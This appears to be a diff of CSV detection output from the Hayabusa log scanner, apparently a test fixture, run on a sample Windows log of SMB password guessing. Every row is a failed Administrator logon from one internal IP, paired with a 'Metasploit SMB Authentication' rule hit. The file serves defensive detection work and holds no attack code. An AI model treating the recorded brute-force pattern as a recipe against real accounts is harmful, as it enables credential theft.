+2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cdYiwh3QjdA0Zoge  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ou3FPUI5bFcUvuFC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bMUg8N7apFtUgX9d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: U7Cn4n7jQAQaxP6y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:13.991 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: urflPvd1vgYYi2ra  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pqFtTDD69fNTKROG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: teUZYpNyqJ64Dgcz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.113 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9kaKSy3DV5fRKvTc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gtiZUzpwrnuWIjna  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SD9UhsShNJRp251r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C5xbL7aO0azgBxfz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xqrUpW8PpI9RAeGk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M80K04eYwfwdzIul  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jcWY7cNeCNgJ3Czr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.497 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1OA561UrTkFnbEj3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iDnu1G7jmwLoXGLF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e2v70poTOKPUNZJo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhzoOmgTrdvTS27z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pyvmBFGhKFgvzM9S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qHC0keHW2YsKeP02  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 29vkwuFa6njYc86s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s9687XPVHFiwttdm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AcNGaeTqTydGinJE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dWRu7ZC1eo1nn0IQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:14.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M52CihyrQk9MOfCR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xBKSOZwS6f9ofXu7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.134 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uT1LHJs7kyeMmTtd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7FvZhetkdjnZOSpq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0DDC7WfL5T4d01yT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1dUzuddZH3Stespw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LKpORcDX0ccf1xMq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u4RbbKttCYPld8RR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: joni643cVcuBZH9K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bqY6TkW782CWKtvK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d8c1I63ULh17l0rN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cjOtMpWutC9qeSss  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gmsFnerFYwXXe4Wt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rzIZ4vC0E2CYq5mc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0uZe50jJH0aj9xZi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LZM5UuxLymuAMJcw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iF1dq6UfuqpFpGkf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NQVTj9OLayvEg8dg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 98F9mULm7DsRUN49  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h6KjEOAdknvIMwOA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UHUu0OKm8fsHTnum  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: esdoSyg6HkaSiJ0z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
